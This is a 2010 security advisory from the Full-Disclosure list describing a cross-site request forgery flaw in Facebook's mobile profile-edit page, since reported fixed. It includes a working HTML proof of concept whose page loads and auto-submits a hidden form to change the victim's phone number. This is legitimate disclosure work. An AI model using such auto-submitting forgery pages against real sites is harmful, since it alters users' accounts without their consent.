[ISecAuditors Security Advisories] Facebook Cross-Site Request Forgery vulnerability

[ISecAuditors Security Advisories <advisories () isecauditors com>]

=============================================
INTERNET SECURITY AUDITORS ALERT 2010-002
- Original release date: February 2nd, 2010
- Last revised: February 12th, 2010
- Discovered by: Juan Galiana Lara
- Severity: 6.3/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Facebook Cross-Site Request Forgery vulnerability

II. BACKGROUND
-------------------------
Facebook is a social networking website that is operated and privately
owned by Facebook, Inc. Users can add friends and send them messages,
and update their personal profiles to notify friends about themselves.
Additionally, users can join networks organized by city, workplace,
school, and region. The website's name stems from the colloquial name
of books given at the start of the academic year by university
administrations with the intention of helping students to get to know
each other better.

III. DESCRIPTION
-------------------------
The mobile interface of Facebook social network is affected by
Cross-Site Request Forgery (CSRF) vulnerability.
The CSRF is due resource http://m.facebook.com/a/editprofile.php is
not properly protected with a token when attempting to update some
variables like phone_cell or phone_other. An attacker can force a user
to perform actions on Facebook, changing its profile in an
unauthorized manner.

IV. PROOF OF CONCEPT
-------------------------
CSRF POC:

<html>
<head>
<script>
function send() {
        document.forms[0].submit();
}
</script>
</head>

<body onload="send();">
<form
action="http://m.facebook.com/a/editprofile.php?edit=phone_cell&type=contact";
method="post">
<input type="hidden" name="phone_num" value="600000000">
<input type="hidden" name="save" value="">
</form>
</body>
</html>

other variables are affected, like phone_num and phone_ext when edit
has the value phone_other.

V. BUSINESS IMPACT
-------------------------
An attacker can force an end user to execute unwanted actions on
Facebook. Successful exploitation of proof of concept allows to update
data of the victim profile.

VI. SYSTEMS AFFECTED
-------------------------
Facebook

VII. SOLUTION
-------------------------
Corrected.

VIII. REFERENCES
-------------------------
http://www.facebook.com
http://www.isecauditors.com
http://juangaliana.blogspot.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by
Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
February   2, 2010: Initial release.
February  10, 2010: Last review.

XI. DISCLOSURE TIMELINE
-------------------------
February   2, 2010: Discovered by Internet Security Auditors.
February   3, 2010: Vendor contacted.
February   4, 2010: Response: under review.
February   9, 2010: Corrected.
February  10, 2010: Request status. Reponse: correction in progress.
February  12, 2010: Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/